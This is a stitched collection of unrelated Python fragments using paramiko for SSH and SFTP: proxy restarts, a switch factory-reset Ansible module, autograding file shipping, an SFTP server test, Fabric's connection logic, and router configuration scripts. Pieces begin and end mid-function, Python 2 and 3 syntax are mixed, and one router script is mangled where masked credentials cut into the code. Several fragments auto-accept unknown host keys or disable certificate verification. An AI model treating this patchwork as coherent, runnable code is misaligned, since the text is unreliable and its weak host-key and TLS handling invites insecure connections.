LOG.info('output from remote: ' + str(ssh_stderr))
ssh_stdin, ssh_stdout, ssh_stderr = ssh.exec_command(
'sudo systemctl restart mon-probe.service')
LOG.info('output from remote: ' + str(ssh_stdout))
LOG.info('output from remote: ' + str(ssh_stdin))
LOG.info('output from remote: ' + str(ssh_stderr))
ssh.close()
elif function == 1:
LOG.info("SSH client stop")
LOG.info("SSH connection established")
ssh_stdin, ssh_stdout, ssh_stderr = ssh.exec_command(
'sudo service squid stop')
LOG.info('output from remote: ' + str(ssh_stdout))
LOG.info('output from remote: ' + str(ssh_stdin))
LOG.info('output from remote: ' + str(ssh_stderr))
ssh.close()
elif function == 2:
LOG.info("SSH client configure")
LOG.info("SSH connection established")
ssh_stdin, ssh_stdout, ssh_stderr = ssh.exec_command(
'sudo service squid stop')
LOG.info('output from remote: ' + str(ssh_stdout))
LOG.info('output from remote: ' + str(ssh_stdin))
LOG.info('output from remote: ' + str(ssh_stderr))
ftp = ssh.open_sftp()
LOG.info("SFTP connection established")
localpath = self.alternate_squid_cfg_file
LOG.info("SFTP connection entering on %s", localpath)
remotepath = '/tmp/squid.conf'
sftpa = ftp.put(localpath, remotepath)
ftp.close()
ssh_stdin, ssh_stdout, ssh_stderr = ssh.exec_command(
'sudo mv /etc/squid3/squid.conf /etc/squid3/squid.conf.old')
LOG.info('output from remote: ' + str(ssh_stdout))
LOG.info('output from remote: ' + str(ssh_stdin))
LOG.info('output from remote: ' + str(ssh_stderr))
ssh_stdin, ssh_stdout, ssh_stderr = ssh.exec_command(
'sudo cp /tmp/squid.conf /etc/squid3')
LOG.info('output from remote: ' + str(ssh_stdout))
LOG.info('output from remote: ' + str(ssh_stdin))
LOG.info('output from remote: ' + str(ssh_stderr))
ssh_stdin, ssh_stdout, ssh_stderr = ssh.exec_command(
'sudo service squid restart')
LOG.info('output from remote: ' + str(ssh_stdout))
LOG.info('output from remote: ' + str(ssh_stdin))
LOG.info('output from remote: ' + str(ssh_stderr))
ssh.close()
elif function == 3:
LOG.info("SSH client scale")
LOG.info("SSH connection established")
ssh_stdin, ssh_stdout, ssh_stderr = ssh.exec_command(
'sudo service squid start')
LOG.info('output from remote: ' + str(ssh_stdout))
LOG.info('output from remote: ' + str(ssh_stdin))
LOG.info('output from remote: ' + str(ssh_stderr))
ssh.close()
else:
LOG.info("Invalid operation on FSM %s", function)
return
def connect(host):
client = paramiko.SSHClient()
client.load_system_host_keys()
client.set_missing_host_key_policy(paramiko.WarningPolicy())
client.connect(host)
return client
def main():
module = AnsibleModule(argument_spec=dict(
outputfile=dict(required=True),
host=dict(required=True),
username=dict(required=True),
password=dict(required=True, no_log=True),
enablePassword=dict(required=False, no_log=True),
deviceType=dict(required=True),
),
supports_check_mode=False)
username = module.params['username']
password = module.params['password']
enablePassword = module.params['enablePassword']
cliCommand = "save erase \n"
outputfile = module.params['outputfile']
hostIP = module.params['host']
deviceType = module.params['deviceType']
output = ""
# Create instance of SSHClient object
remote_conn_pre = paramiko.SSHClient()
# Automatically add untrusted hosts (make sure okay for security policy in your environment)
remote_conn_pre.set_missing_host_key_policy(paramiko.AutoAddPolicy())
# initiate SSH connection with the switch
remote_conn_pre.connect(hostIP, username=username, password=password)
time.sleep(2)
# Use invoke_shell to establish an 'interactive session'
remote_conn = remote_conn_pre.invoke_shell()
time.sleep(2)
# Enable and enter configure terminal then send command
output = output + cnos.waitForDeviceResponse("\n", ">", 2, remote_conn)
output = output + cnos.enterEnableModeForDevice(enablePassword, 3,
remote_conn)
# Make terminal length = 0
output = output + cnos.waitForDeviceResponse("terminal length 0\n", "#", 2,
remote_conn)
# cnos.debugOutput(cliCommand)
# Send the CLi command
output = output + cnos.waitForDeviceResponse(cliCommand, "[n]", 2,
remote_conn)
output = output + cnos.waitForDeviceResponse("y" + "\n", "#", 2,
remote_conn)
# Save it into the file
file = open(outputfile, "a")
file.write(output)
file.close()
errorMsg = cnos.checkOutputForError(output)
if (errorMsg is None):
module.exit_json(
changed=True,
msg="Switch Startup Config is Reset to factory settings ")
else:
module.fail_json(msg=errorMsg)
def update_worker_json(name, entry):
fd, tmp_json_path = tempfile.mkstemp()
foreign_json = os.path.join(SUBMITTY_DATA_DIR, "autograding_TODO",
"autograding_worker.json")
autograding_worker_to_ship = entry
try:
user = autograding_worker_to_ship[name]['username']
host = autograding_worker_to_ship[name]['address']
except Exception as e:
print(
"ERROR: autograding_workers.json entry for {0} is malformatted. {1}"
.format(e, name))
autograding_utils.log_message(
AUTOGRADING_LOG_PATH,
JOB_ID,
message=
"ERROR: autograding_workers.json entry for {0} is malformed. {1}".
format(e, name))
autograding_utils.log_stack_trace(AUTOGRADING_STACKTRACE_PATH,
job_id=JOB_ID,
trace=traceback.format_exc())
return False
#create a new temporary json with only the entry for the current machine.
with open(tmp_json_path, 'w') as outfile:
json.dump(autograding_worker_to_ship,
outfile,
sort_keys=True,
indent=4)
#if we are updating the current machine, we can just move the new json to the appropriate spot (no ssh needed)
if host == "localhost":
try:
shutil.move(tmp_json_path, foreign_json)
print(
"Successfully updated local autograding_TODO/autograding_worker.json"
)
autograding_utils.log_message(
AUTOGRADING_LOG_PATH,
JOB_ID,
message=
"Successfully updated local autograding_TODO/autograding_worker.json"
)
return True
except Exception as e:
autograding_utils.log_stack_trace(AUTOGRADING_STACKTRACE_PATH,
job_id=JOB_ID,
trace=traceback.format_exc())
autograding_utils.log_message(
AUTOGRADING_LOG_PATH,
JOB_ID,
message=
"ERROR: could not mv to local autograding_TODO/autograding_worker.json due to the following error: "
+ str(e))
print(
"ERROR: could not mv to local autograding_worker.json due to the following error: {0}"
.format(e))
return False
finally:
os.close(fd)
#if we are updating a foreign machine, we must connect via ssh and use sftp to update it.
else:
#try to establish an ssh connection to the host
try:
ssh = paramiko.SSHClient()
ssh.get_host_keys()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(hostname=host, username=user, timeout=5)
except Exception as e:
autograding_utils.log_stack_trace(AUTOGRADING_STACKTRACE_PATH,
job_id=JOB_ID,
trace=traceback.format_exc())
autograding_utils.log_message(
AUTOGRADING_LOG_PATH,
JOB_ID,
message=
"ERROR: could not ssh to {0}@{1} due to following error: {2}".
format(user, host, str(e)))
print(
"ERROR: could not ssh to {0}@{1} due to following error: {2}".
format(user, host, str(e)))
return False
#try to copy the files over to the host
try:
sftp = ssh.open_sftp()
sftp.put(tmp_json_path, foreign_json)
sftp.close()
print(
"Successfully forwarded autograding_worker.json to {0}".format(
name))
autograding_utils.log_message(
AUTOGRADING_LOG_PATH,
JOB_ID,
message="Successfully forwarded autograding_worker.json to {0}"
.format(name))
success = True
except Exception as e:
autograding_utils.log_stack_trace(AUTOGRADING_STACKTRACE_PATH,
job_id=JOB_ID,
trace=traceback.format_exc())
autograding_utils.log_message(
AUTOGRADING_LOG_PATH,
JOB_ID,
message=
"ERROR: could not sftp to foreign autograding_TODO/autograding_worker.json due to the following error: "
+ str(e))
print(
"ERROR: could sftp to foreign autograding_TODO/autograding_worker.json due to the following error: {0}"
.format(e))
success = False
finally:
os.close(fd)
os.remove(tmp_json_path)
sftp.close()
ssh.close()
return success
def testSftpService(self):
users = ({
'email': '*****@*****.**',
'login': '******',
'firstName': 'First',
'lastName': 'Last',
'password': '******'
}, {
'email': '*****@*****.**',
'login': '******',
'firstName': 'First',
'lastName': 'Last',
'password': '******'
})
admin, user = [User().createUser(**user) for user in users]
collections = ({
'name': 'public collection',
'public': True,
'creator': admin
}, {
'name': 'private collection',
'public': False,
'creator': admin
})
privateFolder = Folder().findOne({
'parentCollection': 'user',
'parentId': user['_id'],
'name': 'Private'
})
self.assertIsNotNone(privateFolder)
Upload().uploadFromFile(
six.BytesIO(b'hello world'), size=11, name='test.txt', parentType='folder',
parent=privateFolder, user=user)
for coll in collections:
Collection().createCollection(**coll)
client = paramiko.SSHClient()
client.load_system_host_keys()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
# Incorrect password should raise authentication error
with self.assertRaises(paramiko.AuthenticationException):
client.connect(
'localhost', TEST_PORT, username='******', password='******', look_for_keys=False,
allow_agent=False)
# Authenticate as admin
client.connect(
'localhost', TEST_PORT, username='******', password='******', look_for_keys=False,
allow_agent=False)
sftpClient = client.open_sftp()
self.assertEqual(sftpClient.listdir('/'), ['collection', 'user'])
# Listing an invalid top level entity should fail
with self.assertRaises(IOError):
sftpClient.listdir('/foo')
# Test listing of users, collections, and subfolders
self.assertEqual(set(sftpClient.listdir('/user/')), {'admin', 'regularuser'})
self.assertEqual(set(sftpClient.listdir('/user/admin')), {'Public', 'Private'})
self.assertEqual(
set(sftpClient.listdir('/collection')), {'public collection', 'private collection'})
self.assertEqual(sftpClient.listdir('/user/regularuser/Private'), ['test.txt'])
self.assertEqual(sftpClient.listdir('/user/regularuser/Private/test.txt'), ['test.txt'])
with six.assertRaisesRegex(self, IOError, 'No such file'):
sftpClient.listdir('/user/nonexistent')
with six.assertRaisesRegex(self, IOError, 'No such file'):
sftpClient.file('/user/regularuser/Private')
# Read a file using small enough buf size to require multiple chunks internally.
file = sftpClient.file('/user/regularuser/Private/test.txt/test.txt', 'r', bufsize=4)
self.assertEqual(file.read(2), b'he')
self.assertEqual(file.read(), b'llo world')
# Make sure we enforce max buffer length
tmp, sftp.MAX_BUF_LEN = sftp.MAX_BUF_LEN, 2
file = sftpClient.file('/user/regularuser/Private/test.txt/test.txt', 'r', bufsize=4)
with self.assertRaises(IOError):
file.read()
sftp.MAX_BUF_LEN = tmp
# Test stat capability
info = sftpClient.stat('/user/regularuser/Private')
self.assertTrue(stat.S_ISDIR(info.st_mode))
self.assertFalse(stat.S_ISREG(info.st_mode))
self.assertEqual(info.st_mode & 0o777, 0o777)
# lstat should also work
info = sftpClient.lstat('/user/regularuser/Private/test.txt/test.txt')
self.assertFalse(stat.S_ISDIR(info.st_mode))
self.assertTrue(stat.S_ISREG(info.st_mode))
self.assertEqual(info.st_size, 11)
self.assertEqual(info.st_mode & 0o777, 0o777)
# File stat implementations should agree
info = file.stat()
self.assertFalse(stat.S_ISDIR(info.st_mode))
self.assertTrue(stat.S_ISREG(info.st_mode))
self.assertEqual(info.st_size, 11)
self.assertEqual(info.st_mode & 0o777, 0o777)
# Make sure we can stat the top-level entities
for path in ('/', '/user', '/collection'):
info = sftpClient.stat(path)
self.assertTrue(stat.S_ISDIR(info.st_mode))
self.assertFalse(stat.S_ISREG(info.st_mode))
self.assertEqual(info.st_mode & 0o777, 0o777)
sftpClient.close()
client.close()
# Test that any username other than anonymous will fail using auth_none.
sock = socket.socket()
sock.connect(('localhost', TEST_PORT))
trans = paramiko.Transport(sock)
trans.connect()
with self.assertRaises(paramiko.ssh_exception.BadAuthenticationType):
trans.auth_none('')
trans.close()
sock.close()
sock = socket.socket()
sock.connect(('localhost', TEST_PORT))
trans = paramiko.Transport(sock)
trans.connect()
with self.assertRaises(paramiko.ssh_exception.BadAuthenticationType):
trans.auth_none('eponymous')
trans.close()
sock.close()
# Test that a connection can be opened for anonymous access using auth_none.
sock = socket.socket()
sock.connect(('localhost', TEST_PORT))
trans = paramiko.Transport(sock)
trans.connect()
trans.auth_none(username='******')
sftpClient = paramiko.SFTPClient.from_transport(trans)
# Only public data should be visible
self.assertEqual(set(sftpClient.listdir('/user')), {'admin', 'regularuser'})
self.assertEqual(sftpClient.listdir('/collection'), ['public collection'])
self.assertEqual(sftpClient.listdir('/user/admin'), ['Public'])
# Make sure the client cannot distinguish between a resource that does not exist
# vs. one they simply don't have read access to.
with six.assertRaisesRegex(self, IOError, 'No such file'):
sftpClient.listdir('/user/regularuser/Private')
with six.assertRaisesRegex(self, IOError, 'No such file'):
sftpClient.file('/user/regularuser/Private/test.txt/test.txt', 'r')
sftpClient.close()
trans.close()
sock.close()
# Test anonymous access
client = paramiko.SSHClient()
client.load_system_host_keys()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
client.connect(
'localhost', TEST_PORT, username='******', password='', look_for_keys=False,
allow_agent=False)
sftpClient = client.open_sftp()
# Only public data should be visible
self.assertEqual(set(sftpClient.listdir('/user')), {'admin', 'regularuser'})
self.assertEqual(sftpClient.listdir('/collection'), ['public collection'])
self.assertEqual(sftpClient.listdir('/user/admin'), ['Public'])
# Make sure the client cannot distinguish between a resource that does not exist
# vs. one they simply don't have read access to.
with six.assertRaisesRegex(self, IOError, 'No such file'):
sftpClient.listdir('/user/regularuser/Private')
with six.assertRaisesRegex(self, IOError, 'No such file'):
sftpClient.file('/user/regularuser/Private/test.txt/test.txt', 'r')
sftpClient.close()
client.close()
def exec_operational(self):
if self._client is None:
self._client = paramiko.SSHClient()
self._client._transport = self._transport
# A script to control a series of routers. which can read output of a given command
# in a seperated text file for further processing.
# Author: Adam Mujtaba
import paramiko
from hosts import host
config_file = 'config.txt'
username = '******'
password = '******'
SSH = paramiko.SSHClient()
SSH.set_missing_host_key_policy(paramiko.AutoAddPolicy())
for connect in host:
try:
print('connecting to ' + host)
SSH.connect(host, port=22, username=username, password=password)
except paramiko.ssh_exception.NoValidConnectionsError:
print(
'multiple connections were made, please set time delay to the script.'
)
except paramiko.ssh_exception.AuthenticationException:
print('authentication failed')
except paramiko.ssh_exception.SSHException:
print(
'failed to accomodate a connection to the server, please check connection or inputs'
)
except Exception:
print('something went wrong')
with open(config_file, 'r') as output:
print (f"\n{ip_addr} Not Connected\n")
while True:
try:
input_file = input("Input Your Configuration File: ")
read_file = open(input_file, "r").readlines()
break
except IOError:
print("File Not Found!!")
continue
username = input("Username: "******"\nSuccess Login to {ip_addr}")
print ("\nIs Configuring.....")
for config in read_file:
ssh_login.exec_command(config)
time.sleep(1)
time = datetime.now()
print (f"\nSuccessful Configuring {ip_addr}")
print("At " + time.strftime("%Y") + "-" + time.strftime("%m") + "-" + time.strftime("%d")
+ " " + time.strftime("%H") + ":" + time.strftime("%M") + ":" + time.strftime("%S"))
ssh_login.close()
def connect(user, host, port, cache, seek_gateway=True):
"""
Create and return a new SSHClient instance connected to given host.
:param user: Username to connect as.
:param host: Network hostname.
:param port: SSH daemon port.
:param cache:
A ``HostConnectionCache`` instance used to cache/store gateway hosts
when gatewaying is enabled.
:param seek_gateway:
Whether to try setting up a gateway socket for this connection. Used so
the actual gateway connection can prevent recursion.
"""
from fabric.state import env, output
#
# Initialization
#
# Init client
client = ssh.SSHClient()
# Load system hosts file (e.g. /etc/ssh/ssh_known_hosts)
known_hosts = env.get('system_known_hosts')
if known_hosts:
client.load_system_host_keys(known_hosts)
# Load known host keys (e.g. ~/.ssh/known_hosts) unless user says not to.
if not env.disable_known_hosts:
client.load_system_host_keys()
# Unless user specified not to, accept/add new, unknown host keys
if not env.reject_unknown_hosts:
client.set_missing_host_key_policy(ssh.AutoAddPolicy())
#
# Connection attempt loop
#
# Initialize loop variables
connected = False
password = get_password(user, host, port, login_only=True)
tries = 0
sock = None
# Loop until successful connect (keep prompting for new password)
while not connected:
# Attempt connection
try:
tries += 1
# (Re)connect gateway socket, if needed.
# Nuke cached client object if not on initial try.
if seek_gateway:
sock = get_gateway(host, port, cache, replace=tries > 0)
# Set up kwargs (this lets us skip GSS-API kwargs unless explicitly
# set; otherwise older Paramiko versions will be cranky.)
kwargs = dict(
hostname=host,
port=int(port),
username=user,
password=password,
pkey=key_from_env(password),
key_filename=key_filenames(),
timeout=env.timeout,
allow_agent=not env.no_agent,
look_for_keys=not env.no_keys,
sock=sock,
)
for suffix in ('auth', 'deleg_creds', 'kex'):
name = "gss_" + suffix
val = env.get(name, None)
if val is not None:
kwargs[name] = val
# Ready to connect
client.connect(**kwargs)
connected = True
# set a keepalive if desired
if env.keepalive:
client.get_transport().set_keepalive(env.keepalive)
return client
# BadHostKeyException corresponds to key mismatch, i.e. what on the
# command line results in the big banner error about man-in-the-middle
# attacks.
except ssh.BadHostKeyException, e:
raise NetworkError("Host key for %s did not match pre-existing key! Server's key was changed recently, or possible man-in-the-middle attack." % host, e)
# Prompt for new password to try on auth failure
except (
ssh.AuthenticationException,
ssh.PasswordRequiredException,
ssh.SSHException
), e:
msg = str(e)
# If we get SSHExceptionError and the exception message indicates
# SSH protocol banner read failures, assume it's caused by the
# server load and try again.
if e.__class__ is ssh.SSHException \
and msg == 'Error reading SSH protocol banner':
if _tried_enough(tries):
raise NetworkError(msg, e)
continue
# For whatever reason, empty password + no ssh key or agent
# results in an SSHException instead of an
# AuthenticationException. Since it's difficult to do
# otherwise, we must assume empty password + SSHException ==
# auth exception.
#
# Conversely: if we get SSHException and there
# *was* a password -- it is probably something non auth
# related, and should be sent upwards. (This is not true if the
# exception message does indicate key parse problems.)
#
# This also holds true for rejected/unknown host keys: we have to
# guess based on other heuristics.
if (
e.__class__ is ssh.SSHException
and (
password
or msg.startswith('Unknown server')
or "not found in known_hosts" in msg
)
and not is_key_load_error(e)
):
raise NetworkError(msg, e)
# Otherwise, assume an auth exception, and prompt for new/better
# password.
# Paramiko doesn't handle prompting for locked private
# keys (i.e. keys with a passphrase and not loaded into an agent)
# so we have to detect this and tweak our prompt slightly.
# (Otherwise, however, the logic flow is the same, because
# ssh's connect() method overrides the password argument to be
# either the login password OR the private key passphrase. Meh.)
#
# NOTE: This will come up if you normally use a
# passphrase-protected private key with ssh-agent, and enter an
# incorrect remote username, because ssh.connect:
# * Tries the agent first, which will fail as you gave the wrong
# username, so obviously any loaded keys aren't gonna work for a
# nonexistent remote account;
# * Then tries the on-disk key file, which is passphrased;
# * Realizes there's no password to try unlocking that key with,
# because you didn't enter a password, because you're using
# ssh-agent;
# * In this condition (trying a key file, password is None)
# ssh raises PasswordRequiredException.
text = None
if e.__class__ is ssh.PasswordRequiredException \
or is_key_load_error(e):
# NOTE: we can't easily say WHICH key's passphrase is needed,
# because ssh doesn't provide us with that info, and
# env.key_filename may be a list of keys, so we can't know
# which one raised the exception. Best not to try.
prompt = "[%s] Passphrase for private key"
text = prompt % env.host_string
password = prompt_for_password(text)
# Update env.password, env.passwords if empty
set_password(user, host, port, password)
# ftp.cwd('debian') # change into "debian" directory
# ftp.retrlines('LIST') # list directory contents
# ftp.retrbinary('RETR README', open('README', 'wb').write)
# ftp.quit()
with FTP("ftp1.at.proftpd.org") as ftp:
ftp.login()
ftp.dir()
'''
Tip_010302 SSH
'''
import paramiko, socket
paramiko.util.log_to_file('ssh.log')
ssh_con=paramiko.SSHClient()
ssh_con.load_system_host_keys()
ssh_con.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
ssh_con.connect(hostname='65.52.172.145',username='******',password='******')
# paramiko.transport: Authentication type (publickey) not permitted
# ssh_con.connect(ip,username=user,password=passwd,look_for_keys=False)
except paramiko.AuthenticationException:
print("Auth Failed!")
except socket.error:
print("Server is unreachable!")
else:
stdin,stdout,stderr = ssh_con.exec_command('uname -a')
print(stdout.read())
finally:
ssh_con.close()
def prepare_job(my_name, which_machine, which_untrusted, next_directory,
next_to_grade):
# verify the DAEMON_USER is running this script
if not int(os.getuid()) == int(DAEMON_UID):
autograding_utils.log_message(
AUTOGRADING_LOG_PATH,
JOB_ID,
message="ERROR: must be run by DAEMON_USER")
raise SystemExit(
"ERROR: the submitty_autograding_shipper.py script must be run by the DAEMON_USER"
)
if which_machine == 'localhost':
address = which_machine
else:
address = which_machine.split('@')[1]
# prepare the zip files
try:
autograding_zip_tmp, submission_zip_tmp = packer_unpacker.prepare_autograding_and_submission_zip(
which_machine, which_untrusted, next_directory, next_to_grade)
fully_qualified_domain_name = socket.getfqdn()
servername_workername = "{0}_{1}".format(fully_qualified_domain_name,
address)
autograding_zip = os.path.join(
SUBMITTY_DATA_DIR, "autograding_TODO",
servername_workername + "_" + which_untrusted + "_autograding.zip")
submission_zip = os.path.join(
SUBMITTY_DATA_DIR, "autograding_TODO",
servername_workername + "_" + which_untrusted + "_submission.zip")
todo_queue_file = os.path.join(
SUBMITTY_DATA_DIR, "autograding_TODO",
servername_workername + "_" + which_untrusted + "_queue.json")
with open(next_to_grade, 'r') as infile:
queue_obj = json.load(infile)
queue_obj["which_untrusted"] = which_untrusted
queue_obj["which_machine"] = which_machine
queue_obj["ship_time"] = dateutils.write_submitty_date(
microseconds=True)
except Exception as e:
autograding_utils.log_stack_trace(AUTOGRADING_STACKTRACE_PATH,
job_id=JOB_ID,
trace=traceback.format_exc())
autograding_utils.log_message(
AUTOGRADING_LOG_PATH,
JOB_ID,
message=
"ERROR: failed preparing submission zip or accessing next to grade "
+ str(e))
print(
"ERROR: failed preparing submission zip or accessing next to grade ",
e)
return False
if address == "localhost":
try:
shutil.move(autograding_zip_tmp, autograding_zip)
shutil.move(submission_zip_tmp, submission_zip)
with open(todo_queue_file, 'w') as outfile:
json.dump(queue_obj, outfile, sort_keys=True, indent=4)
except Exception as e:
autograding_utils.log_stack_trace(AUTOGRADING_STACKTRACE_PATH,
job_id=JOB_ID,
trace=traceback.format_exc())
autograding_utils.log_message(
AUTOGRADING_LOG_PATH,
JOB_ID,
message=
"ERROR: could not move files due to the following error: " +
str(e))
print(
"ERROR: could not move files due to the following error: {0}".
format(e))
return False
else:
try:
user, host = which_machine.split("@")
ssh = paramiko.SSHClient()
ssh.get_host_keys()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(hostname=host, username=user, timeout=5)
sftp = ssh.open_sftp()
sftp.put(autograding_zip_tmp, autograding_zip)
sftp.put(submission_zip_tmp, submission_zip)
with open(todo_queue_file, 'w') as outfile:
json.dump(queue_obj, outfile, sort_keys=True, indent=4)
sftp.put(todo_queue_file, todo_queue_file)
os.remove(todo_queue_file)
print("Successfully forwarded files to {0}".format(my_name))
success = True
except Exception as e:
autograding_utils.log_stack_trace(AUTOGRADING_STACKTRACE_PATH,
job_id=JOB_ID,
trace=traceback.format_exc())
autograding_utils.log_message(
AUTOGRADING_LOG_PATH,
JOB_ID,
message=
"ERROR: could not move files due to the following error: " +
str(e))
print(
"Could not move files due to the following error: {0}".format(
e))
success = False
finally:
sftp.close()
ssh.close()
os.remove(autograding_zip_tmp)
os.remove(submission_zip_tmp)
return success
# log completion of job preparation
obj = packer_unpacker.load_queue_file_obj(JOB_ID, next_directory,
next_to_grade)
partial_path = os.path.join(obj["gradeable"], obj["who"],
str(obj["version"]))
item_name = os.path.join(obj["semester"], obj["course"], "submissions",
partial_path)
is_batch = "regrade" in obj and obj["regrade"]
autograding_utils.log_message(AUTOGRADING_LOG_PATH,
JOB_ID,
jobname=item_name,
which_untrusted=which_untrusted,
is_batch=is_batch,
message="Prepared job for " + which_machine)
return True
def run_task(self, fw_spec):
shell_interpret = self.get('shell_interpret', True)
ignore_errors = self.get('ignore_errors')
max_retry = self.get('max_retry', 0)
retry_delay = self.get('retry_delay', 10)
mode = self.get('mode', 'move')
if mode == 'rtransfer':
# remote transfers
# Create SFTP connection
import paramiko
ssh = paramiko.SSHClient()
ssh.load_host_keys(expanduser(os.path.join("~", ".ssh", "known_hosts")))
ssh.connect(self['server'], username=self.get('user'), key_filename=self.get('key_filename'))
sftp = ssh.open_sftp()
for f in self["files"]:
try:
if 'src' in f:
src = os.path.abspath(expanduser(expandvars(f['src']))) if shell_interpret \
else f['src']
else:
src = abspath(expanduser(expandvars(f))) if shell_interpret else f
if mode == 'rtransfer':
dest = self['dest']
if os.path.isdir(src):
if not self._rexists(sftp, dest):
sftp.mkdir(dest)
for f in os.listdir(src):
if os.path.isfile(os.path.join(src,f)):
sftp.put(os.path.join(src, f), os.path.join(dest, f))
else:
if not self._rexists(sftp, dest):
sftp.mkdir(dest)
sftp.put(src, os.path.join(dest, os.path.basename(src)))
else:
if 'dest' in f:
dest = abspath(expanduser(expandvars(f['dest']))) if shell_interpret \
else f['dest']
else:
dest = abspath(expanduser(expandvars(self['dest']))) if shell_interpret \
else self['dest']
FileTransferTask.fn_list[mode](src, dest)
except:
traceback.print_exc()
if max_retry:
# we want to avoid hammering either the local or remote machine
time.sleep(retry_delay)
self['max_retry'] -= 1
self.run_task(fw_spec)
elif not ignore_errors:
raise ValueError(
"There was an error performing operation {} from {} "
"to {}".format(mode, self["files"], self["dest"]))
if mode == 'rtransfer':
sftp.close()
ssh.close()
def unpack_job(which_machine, which_untrusted, next_directory, next_to_grade):
# variables needed for logging
obj = packer_unpacker.load_queue_file_obj(JOB_ID, next_directory,
next_to_grade)
partial_path = os.path.join(obj["gradeable"], obj["who"],
str(obj["version"]))
item_name = os.path.join(obj["semester"], obj["course"], "submissions",
partial_path)
is_batch = "regrade" in obj and obj["regrade"]
# verify the DAEMON_USER is running this script
if not int(os.getuid()) == int(DAEMON_UID):
autograding_utils.log_message(
AUTOGRADING_LOG_PATH,
JOB_ID,
message="ERROR: must be run by DAEMON_USER")
raise SystemExit(
"ERROR: the submitty_autograding_shipper.py script must be run by the DAEMON_USER"
)
if which_machine == 'localhost':
address = which_machine
else:
address = which_machine.split('@')[1]
fully_qualified_domain_name = socket.getfqdn()
servername_workername = "{0}_{1}".format(fully_qualified_domain_name,
address)
target_results_zip = os.path.join(
SUBMITTY_DATA_DIR, "autograding_DONE",
servername_workername + "_" + which_untrusted + "_results.zip")
target_done_queue_file = os.path.join(
SUBMITTY_DATA_DIR, "autograding_DONE",
servername_workername + "_" + which_untrusted + "_queue.json")
if which_machine == "localhost":
if not os.path.exists(target_done_queue_file):
return False
else:
local_done_queue_file = target_done_queue_file
local_results_zip = target_results_zip
else:
user, host = which_machine.split("@")
ssh = paramiko.SSHClient()
ssh.get_host_keys()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
ssh.connect(hostname=host, username=user, timeout=5)
sftp = ssh.open_sftp()
fd1, local_done_queue_file = tempfile.mkstemp()
fd2, local_results_zip = tempfile.mkstemp()
#remote path first, then local.
sftp.get(target_done_queue_file, local_done_queue_file)
sftp.get(target_results_zip, local_results_zip)
#Because get works like cp rather tnan mv, we have to clean up.
sftp.remove(target_done_queue_file)
sftp.remove(target_results_zip)
success = True
#This is the normal case (still grading on the other end) so we don't need to print anything.
except FileNotFoundError:
os.remove(local_results_zip)
os.remove(local_done_queue_file)
success = False
#In this more general case, we do want to print what the error was.
#TODO catch other types of exception as we identify them.
except Exception as e:
autograding_utils.log_stack_trace(AUTOGRADING_STACKTRACE_PATH,
job_id=JOB_ID,
trace=traceback.format_exc())
autograding_utils.log_message(
AUTOGRADING_LOG_PATH,
JOB_ID,
message=
"ERROR: Could not retrieve the file from the foreign machine "
+ str(e))
print(
"ERROR: Could not retrieve the file from the foreign machine.\nERROR: {0}"
.format(e))
os.remove(local_results_zip)
os.remove(local_done_queue_file)
success = False
finally:
os.close(fd1)
os.close(fd2)
sftp.close()
ssh.close()
if not success:
return False
# archive the results of grading
try:
success = packer_unpacker.unpack_grading_results_zip(
which_machine, which_untrusted, local_results_zip)
except:
autograding_utils.log_stack_trace(AUTOGRADING_STACKTRACE_PATH,
job_id=JOB_ID,
trace=traceback.format_exc())
autograding_utils.log_message(
AUTOGRADING_LOG_PATH,
JOB_ID,
jobname=item_name,
message=
"ERROR: Exception when unpacking zip. For more details, see traces entry."
)
with contextlib.suppress(FileNotFoundError):
os.remove(local_results_zip)
success = False
with contextlib.suppress(FileNotFoundError):
os.remove(local_done_queue_file)
msg = "Unpacked job from " + which_machine if success else "ERROR: failure returned from worker machine"
print(msg)
autograding_utils.log_message(AUTOGRADING_LOG_PATH,
JOB_ID,
jobname=item_name,
which_untrusted=which_untrusted,
is_batch=is_batch,
message=msg)
return True
def ssh_fuzz(host, username, password, port):
ssh = paramiko.SSHClient()
try:
ssh.connect(host, username=username, password=password, port=port)
except:
pass
def ssh_connect(hostname=None, username=None, password=None):
if slycat.web.server.config["slycat-web-server"]["remote-authentication"][
"method"] != "certificate":
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(hostname=hostname, username=username, password=password)
ssh.get_transport().set_keepalive(5)
else:
import requests
import tempfile
num_bits = 2056
# create the private key
pvt_key = paramiko.RSAKey.generate(num_bits)
# create the public key
pub_key = "ssh-rsa " + pvt_key.get_base64() # SSO specific format
# pub_key = "ssh-rsa " + pvt_key.get_base64()
# + " " + principal + "\n" # General Format, principal is <username>@<hostname>
cherrypy.log.error(
"ssh_connect cert method, POST to sso-auth-server for user: %s" %
cherrypy.request.login)
r = requests.post(slycat.web.server.config["slycat-web-server"]
["sso-auth-server"]["url"],
cert=(slycat.web.server.config["slycat-web-server"]
["ssl-certificate"]["cert-path"],
slycat.web.server.config["slycat-web-server"]
["ssl-certificate"]["key-path"]),
data='{"principal": "' + cherrypy.request.login +
'", "pubkey": "' + pub_key + '"}',
headers={"Content-Type": "application/json"},
verify=False)
cherrypy.log.error("ssh_connect cert method, POST result: %s" % str(r))
# create a cert file obj
# cert_file_object = tempfile.TemporaryFile().write(str(r.json()["certificate"])).seek(0) #this line crashes
cert_file_object = tempfile.TemporaryFile()
cert_file_object.write(str(r.json()["certificate"]))
cert_file_object.seek(0)
# create a key file obj
key_file_object = tempfile.TemporaryFile()
pvt_key.write_private_key(key_file_object)
key_file_object.seek(0)
# create the cert used for auth
cert = paramiko.RSACert(privkey_file_obj=key_file_object,
cert_file_obj=cert_file_object)
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
cherrypy.log.error(
"ssh_connect cert method, calling ssh.connect for user: %s" %
cherrypy.request.login)
import traceback
try:
ssh.connect(hostname=hostname,
username=cherrypy.request.login,
pkey=cert,
port=slycat.web.server.config["slycat-web-server"]
["remote-authentication"]["port"])
except paramiko.AuthenticationException as e:
cherrypy.log.error(
"ssh_connect cert method, authentication failed for %s@%s: %s"
% (cherrypy.request.login, hostname, str(e)))
cherrypy.log.error(
"ssh_connect cert method, called ssh.connect traceback: %s" %
traceback.print_exc())
